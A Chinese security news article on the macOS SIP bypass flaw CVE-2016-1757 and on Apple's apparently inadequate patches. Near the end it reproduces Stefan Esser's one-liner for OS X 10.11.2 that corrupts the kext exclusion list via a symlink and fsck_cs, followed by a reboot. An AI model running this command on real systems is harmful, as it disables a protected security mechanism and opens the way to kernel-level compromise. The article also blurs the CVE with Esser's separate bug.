神刀安全网

安全预警:一个影响1.3亿苹果用户的漏洞利用代码

近日,有安全研究人员发布了一条推文,提及苹果设备的漏洞以及有关漏洞的程序代码。

漏洞修复不理想

在上周有媒体曝光了苹果设备系统中一个关键漏洞( CVE-2016-1757 ),可以利用该漏洞绕过苹果最新的保护功能,即系统完整性保护功能(System Integrity Protection,SIP)。在本周苹果方面已经发布了关于OS X El Capitan 10.11.4和iOS 9.3系统的安全更新来应对此问题,但根据一些安全专家反应这些安全更新没有那么理想,甚至可以被看做是无效的。

最初检测到这个漏洞的是SentinelOne的研究员Pedro Vilaça,而这个漏洞也使得 超过1.3亿的苹果用户处于安全风险当中 。该缺陷存在于苹果的OS X操作系统的多数版本中,SentinelOne已经报告漏洞给苹果公司。

而恶意攻击者可以利用这个漏洞来发起多阶段的网络攻击,并获取目标设备的敏感信息。同时该漏洞存在于OS X每个版本中的一个非内存破坏漏洞,它能允许用户使用任何二进制文件执行任意代码。甚至可以绕过OS X,El Capitan的系统完整性保护(SIP)的最新版本的关键安全功能,篡改其它系统程序进程,到最后可以获取root权限。

对于SIP保护机制,只有mark /System, /bin, /sbin and /usr except /usr/local 这些目录的文件有唯一的标识,也就意味着只有特定的权限才可以修改这些文件。这个成功的绕过SIP的提权攻击将绕过系统完整性,同时也为恶意攻击者提供了后门。

安全研究人员发布相关程序

SentinelOne的安全研究人员发现了这一漏洞,但苹果发布的安全补丁令部分用户感到失望,甚至还影响到了最新版本系统的苹果电脑。目前Stefan Esser发布了一套新的程序代码,利用此代码可以绕过SIP保护机制,下面就是在 推特 上发布的信息:

安全预警:一个影响1.3亿苹果用户的漏洞利用代码

Esser称,影响SIP保护机制的程序并不只是特定情况,而实际上还是有不少设备没有完全修复这一点。

德国安全公司SektionEins的安全研究人员Stefan Esser 在今年的SyScan360会议上发布了一系列有关SIP的漏洞,目前有一个有关SIP的漏洞存在于OS X 10.11.2中(已被修复)。

ln -s /S*/*/E*/A*Li*/*/I* /dev/diskX;fsck_cs /dev/diskX 1>&-;touch /Li*/Ex*/;reboot

扩展程序

ln -s /System/Library/Extensions/AppleKextExcludeList.kext/Contents/Info.plist /dev/diskX

fsck_cs /dev/diskX 1>&-

touch /Library/Extensions/

Reboot

*参考来源: securityaffairstheregister ,FB小编亲爱的兔子编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 安全预警:一个影响1.3亿苹果用户的漏洞利用代码

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮